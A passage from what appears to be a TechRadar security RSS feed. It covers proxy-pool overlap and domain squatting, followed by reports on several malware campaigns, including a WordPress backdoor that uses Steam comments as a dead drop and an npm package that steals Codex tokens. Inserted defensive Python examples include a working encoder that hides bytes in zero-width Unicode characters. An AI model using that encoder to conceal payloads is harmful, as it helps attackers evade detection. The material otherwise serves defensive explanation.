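    exited, so those rows are dropped rather than counted as exits.
    """
    unique = set()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        _ts, raw_ip, status = parts
        if not status.startswith("2"):
            continue
        try:
            unique.add(ipaddress.ip_address(raw_ip))
        except ValueError:          # malformed address: skip, do not crash the run
            continue
    return unique


def parse_reference(text):
    """Reference exits, whitespace-separated, as ip_address objects."""
    return {ipaddress.ip_address(x) for x in text.split()}


def pool_stats(pool):
    """Unique count split by IP version, as in the article's pool description."""
    by_version = Counter(ip.version for ip in pool)
    return {"unique": len(pool), "ipv4": by_version[4], "ipv6": by_version[6]}


def overlap_report(test_pool, reference_pool):
    """Intersection size and its share of each pool (the table's last three rows)."""
    shared = test_pool & reference_pool
    return {
        "shared": len(shared),
        "share_of_test": len(shared) / len(test_pool),
        "share_of_reference": len(shared) / len(reference_pool),
    }


def expected_overlap_if_independent(n_test, n_reference, space_size=2**32):
    """Expected intersection of two independent uniform samples of a space of
    space_size addresses: n_test * n_reference / space_size.

    Over the whole IPv4 space this is a floor. Residential pools draw from a
    far smaller set of eligible addresses, so a realistic baseline is higher,
    but it stays orders of magnitude below the article's 773,087.
    """
    return n_test * n_reference / space_size


# The article's published pool sizes fed to the baseline: about 7,600 shared
# addresses would be expected by chance across the full IPv4 space.
ARTICLE_BASELINE = expected_overlap_if_independent(2_023_029, 16_192_293)

if __name__ == "__main__":
    test_pool = parse_exit_ips(SAMPLE_LOG)
    print(pool_stats(test_pool))
    print(overlap_report(test_pool, parse_reference(REFERENCE_NODES)))
    print(f"chance baseline for the article's pools: {ARTICLE_BASELINE:,.0f}")
```

<p>The chance baseline is a floor rather than a realistic estimate, since residential pools draw from a much smaller set of eligible addresses than the whole IPv4 space; even a baseline one or two orders of magnitude higher stays far below the 773,087 shared addresses observed, which is the point of computing it.</p><p>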
The numbers sit in the table below:</p><div><table><tbody><tr><td class="firstcol"><p>Metric</p></td><td><p>Value</p></td></tr><tr><td class="firstcol"><p>Smartproxy.org unique IPs (test pool)</p></td><td><p>2,023,029</p></td></tr><tr><td class="firstcol"><p>IPIDEA dataset unique IPs (Vastel)</p></td><td><p>16,192,293</p></td></tr><tr><td class="firstcol"><p>IPs present in both pools</p></td><td><p>773,087</p></td></tr><tr><td class="firstcol"><p>Overlap as a share of smartproxy.org</p></td><td><p>38.21%</p></td></tr><tr><td class="firstcol"><p>Overlap as a share of IPIDEA</p></td><td><p>4.77%</p></td></tr></tbody></table></div><h2 id="why-a-38-overlap-points-to-shared-sourcing">Why a 38% overlap points to shared sourcing</h2><p>Residential pools rotate, so some overlap between any two services is normal. IPinfo estimates monthly IPv4 retention in residential pools at around 40%, meaning roughly four in ten addresses visible this month remain next month, while the rest cycle out. Two pools drawing from genuinely separate apps, SDKs, and device populations should not share anything close to 38% of their IPs across a few-week window. </p><p>The IPv4 address space spans more than 4 billion addresses, so an overlap at this scale would be a statistical anomaly if the sources were independent. The pool sizes point the same way. The smartproxy.org pool of about 2 million IPs is roughly an eighth of the 16.2 million IPIDEA dataset, the proportion you would expect when one provider draws from part of a larger upstream pool. Shared sourcing explains the data cleanly.</p><h2 id="5-things-you-can-do-to-combat-digital-squatting">5 things you can do to combat digital squatting</h2><p>Each step below works on its own. 
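</p><p>The four squatting forms defined at the top of this article, and the weekly lookalike check recommended under step 1 below, as an added example (not Decodo's tooling): it builds a watchlist of typo, combo and TLD variants for a brand, folds confusable characters so a homograph written with Cyrillic letters is matched after punycode decoding, and sweeps a constructed certificate-transparency export for hits. The brand "acmeproxy", its allowlisted domains, the CT-log rows and the small confusables table are assumptions made for the demo.</p>

```python
"""Lookalike-domain watchlist and certificate-transparency sweep.

Added example, not Decodo's tooling. The brand "acmeproxy", its allowlisted
domains and the CT-log rows are constructed; the confusables table is a small
subset of the Unicode confusables data, not the full list.
"""
import unicodedata

BRAND = "acmeproxy"
OWN_DOMAINS = {"acmeproxy.com", "acmeproxy.co.uk"}            # constructed allowlist
TLDS = ["com", "org", "net", "io", "ai", "cn", "de", "co.uk"]
KEYWORDS = ["login", "deals", "support", "billing"]             # combosquat suffixes

# Cyrillic/Greek letters that render like Latin ones (assumption: this subset
# is enough for the demo; use the full Unicode confusables table in production).
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u03bf": "o", "\u0455": "s",
})


def skeleton(label):
    """Fold a label to a comparison form: NFKC, lower-case, confusables mapped."""
    return unicodedata.normalize("NFKC", label).lower().translate(CONFUSABLES)


def typosquat_variants(brand):
    """Omission, adjacent transposition and doubled-letter misspellings."""
    out = set()
    for i in range(len(brand)):
        out.add(brand[:i] + brand[i + 1:])                        # drop a char
        out.add(brand[:i] + brand[i] * 2 + brand[i + 1:])         # double a char
        if i + 1 < len(brand):
            out.add(brand[:i] + brand[i + 1] + brand[i] + brand[i + 2:])  # swap pair
    out.discard(brand)
    return out


def combosquat_variants(brand, keywords):
    """brand-login, brandlogin and so on."""
    return {f"{brand}-{k}" for k in keywords} | {f"{brand}{k}" for k in keywords}


def build_watchlist(brand=BRAND, tlds=TLDS, keywords=KEYWORDS):
    """Registrable names worth alerting on: typos, combos and the bare brand
    under every TLD, minus the domains you already own."""
    labels = {brand} | typosquat_variants(brand) | combosquat_variants(brand, keywords)
    return {f"{lab}.{t}" for lab in labels for t in tlds} - OWN_DOMAINS


def to_unicode(host):
    """Decode punycode (xn--) labels so homographs can be compared by skeleton."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host


def classify(host, brand=BRAND, watchlist=None):
    """Reason string if host looks like a squat on brand, else None."""
    watchlist = build_watchlist(brand) if watchlist is None else watchlist
    host = host.lower().lstrip("*.")
    if host in OWN_DOMAINS:
        return None
    if host in watchlist:
        return "watchlist"
    for label in to_unicode(host).split("."):
        sk = skeleton(label)
        if sk == brand and label != brand:
            return "homograph"
        if brand in sk and label != brand:
            return "contains-brand"
    return None


def scan_ct_log(entries, brand=BRAND):
    """Sweep CT-log rows 'timestamp,issuer,domain' and return (domain, reason) hits."""
    watchlist = build_watchlist(brand)
    hits = []
    for row in entries.strip().splitlines():
        _ts, _issuer, domain = row.split(",", 2)
        reason = classify(domain.strip(), brand, watchlist)
        if reason:
            hits.append((domain.strip(), reason))
    return hits


# Constructed CT-log sample; the homograph row is built from a Cyrillic "a".
HOMOGRAPH = "\u0430cmeproxy.com".encode("idna").decode("ascii")   # xn--...
SAMPLE_CT_LOG = f"""
2026-05-02T08:11:09Z,Let's Encrypt,acmeproxy-login.com
2026-05-02T09:40:33Z,ZeroSSL,acmproxy.net
2026-05-03T12:02:51Z,Let's Encrypt,acmeproxy.com
2026-05-03T14:15:00Z,Sectigo,{HOMOGRAPH}
2026-05-04T07:55:12Z,Let's Encrypt,acmeproxy.ai
2026-05-04T16:20:45Z,Let's Encrypt,mail.example.org
2026-05-05T10:00:00Z,Let's Encrypt,shop.acmeproxy-deals.io
"""

if __name__ == "__main__":
    for domain, reason in scan_ct_log(SAMPLE_CT_LOG):
        print(f"{reason:15} {domain}")
```

<p>The generator produces every omission, transposition and doubling rather than the three or four likeliest misspellings the article suggests picking by hand; the full set is cheap to match against a CT feed, while the hand-picked subset is what you would actually spend money registering.</p><p>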
Together, the five steps cover monitoring, prevention, legal action, search, and customer communication.</p><h2 id="1-monitor-for-lookalike-domains-before-they-reach-your-customers">1. Monitor for lookalike domains before they reach your customers</h2><p>Catching a fake domain after a customer reports it means the damage has already happened. Monitoring closes that gap. </p><p>Set up these alerts:</p><p>i) Domain registration alerts for your brand name across common TLDs and misspellings;</p><p>ii) Brand-mention monitoring across search results and social platforms;</p><p>iii) Certificate transparency log monitoring, which surfaces new TLS certificates issued for domains containing your brand name, usually before the site starts serving traffic.</p><p>We learned the full extent of our case through third-party research and customer complaints, later than we wanted. Monitoring would have surfaced the registrations sooner. A weekly check across the main extensions and the three or four most likely misspellings of your name catches most attempts while they’re still new.</p><h2 id="2-register-your-own-domain-variations-first">2. Register your own domain variations first</h2><p>A squatter can’t register a domain you own. Defensive registration removes the easiest targets before anyone reaches for them. </p><p>Claim the obvious variations:</p><p>i) Major TLDs such as .org, .net, .io, and .ai;</p><p>ii) Common misspellings of your brand name;</p><p>iii) Country-code domains for markets you operate in, such as .co.uk, .de, and .cn.</p><p>Turn on registrar lock so the domain cannot be transferred without your say-so, use a reputable <a href="https://www.techradar.com/news/best-domain-registrars">domain registrar</a>, and keep your registration details current. We hit this wall directly when the obvious domains in China were already taken. Claim your namespace early, because the cost of registering domains is far lower than reclaiming them later.</p><h2 id="3-use-your-legal-routes-and-know-their-limits">3. Use your legal routes, and know their limits</h2><p>Trademark law gives you specific tools against squatters. 
The tools work, though they move slowly, so start them early. The following is general information, not legal advice. </p><p>Your main options:</p><p>i) Register your trademark, which is the foundation for every other action;</p><p>ii) Send a cease-and-desist letter to the registrant;</p><p>iii) Report abuse to the domain's registrar and, separately, to the web host serving the impostor site;</p><p>iv) File a domain-name dispute under the UDRP, the procedure behind the WIPO case numbers cited above; a successful complaint transfers or cancels the domain without a court case.</p><h2 id="4-own-your-brand-in-search-results">4. Own your brand in search results</h2><p>When someone searches your brand, the page they click decides whether they reach you or a copy. Ranking above the impersonator removes most of their traffic. </p><p>Make the real you easy to find:</p><p>i) Publish content that states your official domains in plain language;</p><p>ii) Keep rebranding and company information current across your site and profiles;</p><p>iii) Use structured data and verified <a href="https://www.techradar.com/best/best-social-media-management-tools">social media</a> profiles so search engines confirm your identity.</p><p>We published direct, on-record clarifications so anyone searching the old brand finds the truth quickly. We say it plainly: we operate at decodo.com globally and decodo.cn in China. Everything else using the old name isn’t us.</p><h2 id="5-tell-your-customers-and-keep-telling-them">5. Tell your customers, and keep telling them</h2><p>Customers can’t avoid a fake site that they don’t know exists. Telling them turns your audience into a filter against the impersonator. </p><p>Reach them through every channel you have:</p><p>i) Email warnings to your existing customer list;</p><p>ii) A banner or notice on your website;</p><p>iii) A help-center article that customers find when they search for the problem;</p><p>iv) Posts on the social accounts your customers already follow.</p><h2 id="treat-impersonation-as-a-security-problem">Treat impersonation as a security problem</h2><p>Brand impersonation now sits next to the infrastructure-trust problem the IPIDEA takedown exposed. 
A fake domain can route customers into compromised device pools, which makes this a question for security and legal teams, not just marketing. Give it a cross-functional owner who watches domains, files complaints, and updates customers on a schedule. </p><p>Google's action against IPIDEA reduced the available device pool for proxy operators by millions and, in Google's words, may carry downstream impact across affiliated resellers. Squatting that depends on that kind of infrastructure carries the same exposure. Demand transparency from any provider you buy from, and apply the same standard to your own supply chain.</p><p><a href="https://www.techradar.com/best/proxy"><em>We feature the best proxy sites</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing, find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Huge hacking campaign uses spoofed Ghidra, dnSpy, and SpiderFoot security tools to harvest ad revenue and serve malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/huge-hacking-campaign-uses-spoofed-ghidra-dnspy-and-spiderfoot-security-tools-to-harvest-ad-revenue-and-serve-malware</link>
                                                                            <description>
                            <![CDATA[ More than 100 spoofed websites were redirecting users and offering infostealers. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">FYtUVENFQzU7XjYwsv6cVH</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 04 Jun 2026 09:53:09 +0000</pubDate>                                                                                                                                <updated>Thu, 04 Jun 2026 09:53:13 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg">
                                                            <media:credit><![CDATA[Thapana Onphalai via Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:description>                                                            <media:text><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:text>
                                <media:title type="plain"><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Over 100 spoofed sites mimic trusted security tools</strong></li><li><strong>Campaign serves SessionGate, RemusStealer, AnimateClipper</strong></li><li><strong>Primary goal appears to be traffic monetization</strong></li></ul><p>A large-scale malicious campaign was recently uncovered, spoofing reputable open-source security tools to harvest ad revenue and serve malware to developers and security researchers.</p><p>Security outfit <a href="https://research.checkpoint.com/2026/impersonation-click-hijacking-and-tds-inside-a-malware-distribution-ecosystem/" target="_blank" rel="nofollow">Check Point Research (CPR)</a> recently published an in-depth report detailing the campaign. Apparently, threat actors created more than 100 websites spoofing tools such as Ghidra, dnSpy, and SpiderFoot. Visitors were routed through a Traffic Distribution System (TDS) and served multiple malware variants, including SessionGate, RemusStealer, and AnimateClipper.</p><p>“What makes this campaign especially notable is the choice of brands: a high-risk subset of sites impersonates trusted reverse-engineering tools such as Ghidra and dnSpy, used by security researchers and malware analysts,” the report reads.</p><h2 id="traffic-acquisition-and-monetization">Traffic acquisition and monetization</h2><p>CPR describes SessionGate as a new multi-stage loader that makes it very difficult to obtain the final payload. RemusStealer is a newly emerged infostealer targeting browsers and extensions, while AnimateClipper is a cryptocurrency clipper capable of hijacking transactions across more than 20 blockchains. </p><p>Although these websites serve several malware families, CPR does not believe malware delivery is their main goal. 
Instead, it believes the campaign’s primary objective is traffic acquisition and monetization.</p><p>“However, by embedding a gated TDS layer and funneling search traffic into it, the operators become part of a distribution chain whose downstream consumers can include <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> distributors,” CPR stressed. “The same traffic pipeline that drives gray monetization can also selectively route real users to malicious payloads.”</p><p>While CPR did not say how many people were affected by this attack, it does stress that the campaign is rather large-scale. It involves more than 100 websites, as well as more than 5,000 total submissions to VirusTotal. </p><p>To defend against this campaign, and others like it, users are advised not to blindly trust search engine results, and to be careful when clicking on links, even when they’re at the very top of Google and other reputable engines. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Weedhack malware campaign infects 116,000 mod-hungry Minecraft players systems through SEO poisoning and YouTube ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/weedhack-malware-campaign-infects-116-000-mod-hungry-minecraft-players-systems-through-seo-poisoning-and-youtube</link>
                                                                            <description>
                            <![CDATA[ Fake mods and clients are being advertised on YouTube and used to deploy backdoors and infostealers. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">YxPih94PQbFopWzBjYyoUN</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/kdhVdv6powtuEo3tfg5QPE-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 03 Jun 2026 14:25:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/kdhVdv6powtuEo3tfg5QPE-1280-80.jpg">
                                                            <media:credit><![CDATA[Mojang]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Cobblemon mod]]></media:description>                                                            <media:text><![CDATA[Cobblemon mod]]></media:text>
                                <media:title type="plain"><![CDATA[Cobblemon mod]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/kdhVdv6powtuEo3tfg5QPE-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Weedhack spreads via poisoned Minecraft mods on YouTube</strong></li><li><strong>Malware disables defenses and enables remote access</strong></li><li><strong>Offered as MaaS with free and paid tiers</strong></li></ul><p>Cybercriminals are using YouTube to disseminate malware that targets Minecraft users and takes full control over their <a href="https://www.techradar.com/news/best-endpoint-security-software" target="_blank">computers</a>.</p><p>In January this year, security researchers at McAfee Labs spotted a new malicious campaign dubbed Weedhack. In the campaign, the malicious actors created countless YouTube channels and standalone websites, through which they promoted links to Minecraft clients and mods. </p><p>With the help of Weedhack (apparently an enterprise-grade dashboard that also allows crooks to inject the malware into legitimate Minecraft mods), they created poisoned mods and clients which delivered a .JAR file called DonutDupe.jar.</p><p>A JAR (Java ARchive) file is the package format the Java ecosystem uses to bundle multiple files into a single archive. Running this one starts a chain that disables Windows Defender, collects system information, and drops two additional payloads, which establish persistence and enable remote access.</p><p>McAfee said the campaign accumulated a total of 116,464 hits, averaging approximately 2,000 to 3,000 hits per day. Most of them are located in the US, with other notable mentions including Germany, India, the UK, Italy, Vietnam, Canada, Norway, Sweden, Finland, and Spain. </p><p>McAfee describes Weedhack as a ‘Minecraft-focused Malware-as-a-service’ (MaaS). The custom payloads target versions 1.21.0 to 1.21.11 of the game, while the dashboard allows malicious actors to view stolen credentials and exfiltrated system information in a centralized manner. 
The MaaS is apparently being offered in Telegram channels in two tiers - free and paid, and while the free version comes with plenty of features (screenshot grabber, file exfiltrator), the paid one ($4.99 a month) offers webcam access, keylogging, and reverse shell execution. </p><p>“One of the key features that makes Weedhack unique is that it is hosted on the clear net and provides access to sophisticated <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> for free," McAfee’s researchers explained. "This difference in cost and ease of access with detailed tutorials on how to use the malware significantly reduces the barrier to entry for prospective customers. Furthermore, its ability to steal Minecraft accounts attracts a younger audience. Both of these factors complement each other and make the campaign much more lethal."</p><p><em>Via </em><a href="https://thehackernews.com/2026/06/weedhack-attacks-minecraft-users.html" target="_blank" rel="nofollow"><em>The Hacker News</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Steam Community Profiles abused as C2 network in new WordPress malware infection campaign ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/steam-community-profiles-abused-as-c2-network-in-new-wordpress-malware-infection-campaign</link>
                                                                            <description>
                            <![CDATA[ A new cheeky malware campaign abuses the comment section as a roadsign to malware ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">EyczYyhYsLAgPaDCuuw3Fm</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/bx8fPhUoHLYdN39sZtNWZk-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 03 Jun 2026 12:18:13 +0000</pubDate>                                                                                                                                <updated>Wed, 03 Jun 2026 12:18:18 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/bx8fPhUoHLYdN39sZtNWZk-1280-80.jpg">
                                                            <media:credit><![CDATA[Valve]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Logo of Steam with game covers in the background]]></media:description>                                                            <media:text><![CDATA[Logo of Steam with game covers in the background]]></media:text>
                                <media:title type="plain"><![CDATA[Logo of Steam with game covers in the background]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/bx8fPhUoHLYdN39sZtNWZk-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Malware hides payload in Steam Community comments</strong></li><li><strong>WordPress sites used to host backdoors</strong></li><li><strong>Nearly 2,000 sites compromised since July</strong></li></ul><p>Security researchers from GoDaddy found a cheeky new malware campaign that used comments made by Steam Community accounts as a dead drop for its command-and-control (C2) infrastructure.</p><p>Here is how the attack plays out: the attackers first find vulnerable <a href="https://www.techradar.com/best/wordpress-website-builder" target="_blank">WordPress websites</a>, or ones protected by weak credentials, and use them to host PHP malware somewhere in the site’s files. For example, the sample was found in a theme’s ‘functions.php’ file. This malware contains both a JavaScript injection component and a server-side backdoor. </p><p>Then, whenever a visitor loads the infected website, the malware contacts one of several Steam Community profiles and downloads the contents of profile comments. On the surface, these comments look harmless (albeit incoherent), but they also contain invisible Unicode characters which carry the actual payload. </p><p>“This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload,” GoDaddy said.</p><p>The malware then extracts the characters, converts them into binary data, and reconstructs the original bytes. The researchers found that this recovered data contains a URL controlled by the attackers, which points to a domain hosting a JavaScript file spoofing a legitimate library. 
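</p><p>The extraction step described above, as an added example that is neither GoDaddy's code nor the campaign's exact scheme (the page says only that invisible characters carry binary data behind visible camouflage): one function embeds bytes as zero-width characters to build a sample comment, one recovers them, and a triage function flags comments whose zero-width share is far above what normal text has. The bit mapping (U+200B for 0, U+200C for 1), the threshold, the hidden example.com URL and the sample comments are assumptions made for the demo.</p>

```python
"""Recover a payload hidden in invisible Unicode characters inside visible text.

Added example, not GoDaddy's code and not the campaign's exact encoding: the
report as summarised on this page says only that invisible characters carry
binary data behind visible camouflage. The bit mapping, threshold and sample
comments below are assumptions constructed for the demo.
"""
ZERO, ONE = "\u200b", "\u200c"      # ZERO WIDTH SPACE = 0, ZERO WIDTH NON-JOINER = 1

# Zero-width code points worth counting when triaging text (assumption: a
# defender wants any of these flagged, not only the two used as bits here).
INVISIBLE = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff",
             "\u2061", "\u2062", "\u2063", "\u2064"}


def embed(payload: bytes, cover: str) -> str:
    """Spread the payload's bits after successive visible characters of cover.

    Used only to build the sample; an attacker's encoder is the mirror image.
    """
    bits = "".join(format(b, "08b") for b in payload)
    chunk = -(-len(bits) // len(cover))          # bits per cover char, rounded up
    out = []
    for i, ch in enumerate(cover):
        out.append(ch)
        out.append("".join(ONE if b == "1" else ZERO
                           for b in bits[i * chunk:(i + 1) * chunk]))
    return "".join(out)


def extract(text: str) -> bytes:
    """Keep only the two bit-carrying code points, in order, and repack to bytes."""
    bits = "".join("1" if ch == ONE else "0" for ch in text if ch in (ZERO, ONE))
    bits = bits[: len(bits) - len(bits) % 8]     # drop a trailing partial byte
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def invisible_ratio(text: str) -> float:
    """Share of code points that are zero-width; benign text sits near 0."""
    if not text:
        return 0.0
    return sum(ch in INVISIBLE for ch in text) / len(text)


def triage(comments, threshold=0.2):
    """Flag comments whose invisible-character share exceeds threshold and try
    to recover an embedded ASCII string (e.g. a URL) from each."""
    findings = []
    for comment in comments:
        ratio = invisible_ratio(comment)
        if ratio < threshold:
            continue
        recovered = extract(comment)
        findings.append({
            "visible": "".join(ch for ch in comment if ch not in INVISIBLE),
            "ratio": round(ratio, 2),
            "recovered": recovered.decode("ascii", "replace") if recovered else "",
        })
    return findings


# Constructed sample: one benign comment and one carrying a hidden URL that
# points at a (fictitious) script posing as a common library.
HIDDEN_URL = b"https://cdn.example.com/jquery.min.js"
SAMPLE_COMMENTS = [
    "gg nice profile, add me for trades",
    embed(HIDDEN_URL, "great game yesterday lol see you next round"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_COMMENTS):
        print(finding)
```

<p>The ratio check is the part that transfers: it flags the encoding even when the attacker's bit mapping differs from the one assumed here, and the recovery step can then be adjusted once a hit is confirmed, whether the text came from a fetched profile comment or from any other field you suspect of serving as a dead drop.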
</p><p>The malware then uses WordPress to load the attacker-controlled JavaScript on every frontend page, which visitors’ browsers download and run.</p><p>In the campaign, there are two sets of targets: vulnerable WordPress websites and their visitors. Since uncovering the campaign in July last year, GoDaddy said it found almost 2,000 compromised WordPress sites. Unfortunately, the research report stops short of describing what the malware does to visitors.</p><p>If you run a WordPress website, GoDaddy recommends checking for references to Steam Community URLs in site files, injected external JavaScript, and outbound connections from the WordPress host to Steam. </p><p><em>Via </em><a href="https://www.bleepingcomputer.com/news/security/wordpress-malware-campaign-hides-payloads-in-steam-profiles/" target="_blank" rel="nofollow"><em>BleepingComputer</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ OpenAI Codex tool with over 29,000 downloads linked to malicious npm supply chain attack stealing authentication tokens ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/openai-codex-tool-with-over-29-000-downloads-linked-to-malicious-npm-supply-chain-attack-stealing-authentication-tokens</link>
                                                                            <description>
                            <![CDATA[ A tool started benign and turned sour after a little while, stealing tokens and granting persistent access. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">vXcVe5fpJG9SzT2iRuMqu6</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/t3peL5Rd9E7bXzyHuQqJ5K-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 01 Jun 2026 19:05:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/t3peL5Rd9E7bXzyHuQqJ5K-1280-80.jpg">
                                                            <media:credit><![CDATA[OpenAI]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Codex remote control in ChatGPT]]></media:description>                                                            <media:text><![CDATA[Codex remote control in ChatGPT]]></media:text>
                                <media:title type="plain"><![CDATA[Codex remote control in ChatGPT]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/t3peL5Rd9E7bXzyHuQqJ5K-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>Researchers uncovered a malicious npm package posing as a Codex UI tool</strong></li><li><strong>Attackers exfiltrated Codex authentication tokens, including non‑expiring refresh tokens</strong></li><li><strong>Aikido Security also found two Android apps targeting Codex users</strong></li></ul><p>A newly discovered supply-chain attack on npm is targeting software developers using OpenAI Codex.</p><p>Codex is OpenAI’s <a href="https://www.techradar.com/best/best-ai-tools" target="_blank">coding assistant</a> and software engineering agent that can write and review code, fix bugs, run tests, and help developers build software with nothing but plain language input.</p><p>Recently it was discovered that a tool published on both GitHub and npm was actually malicious. It is called “codexui-android”, and it is described as a remote web user interface for the Codex platform. It attracted more than 29,000 weekly downloads, so it was rather popular. One reason for its popularity is that it worked as advertised and appeared legitimate. The code published on GitHub remained “clean” the whole time, meaning the public source code didn’t show any malicious behavior.</p><h2 id="breaking-bad">Breaking bad</h2><p>However, approximately a month into its existence, the tool received an update on npm which added information-stealing code. It primarily hunted for OpenAI login credentials.</p><p>When a developer runs the tool, it looks for their Codex authentication tokens and exfiltrates them to an attacker-controlled server. One of the tokens (the refresh token) can potentially allow an attacker to continue accessing the victim’s OpenAI account for an extended period of time without needing the password. </p><p>The implications are rather dangerous, explained Aikido Security researcher Charlie Eriksen, who found and disclosed the attack. 
Besides the obvious - accessing the victim’s Codex sessions - the attacker can use the tokens to spend the victim’s API credits, to view projects or code they’re working on through Codex, and even impersonate the victim when interacting with OpenAI services. </p><p>"The refresh_token doesn't expire," Eriksen said. "An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface -- it's persistent, silent access to whatever that account can do."</p><p>Aikido also said it saw two Android apps, both published by the same account, which were also targeting Codex users. One is called OpenClaw Codex Claude AI Agent, running the npm package within its PRoot sandbox and sending all Codex credentials to the same attacker-controlled server. This one had more than 50,000 downloads. The other one is called Codex and counts more than 10,000 downloads.</p><p><em>Via </em><a href="https://thehackernews.com/2026/06/openai-codex-authentication-tokens.html" target="_blank" rel="nofollow"><em>The Hacker News</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The biggest cyber threats businesses face in 2026 ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/the-biggest-cyber-threats-businesses-face-in-2026</link>
                                                                            <description>
                            <![CDATA[ AI-driven cyber threats are evolving fast – here's what businesses need to watch in 2026. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">qHqyo7BpsQZiuawCcHDLqm</guid>
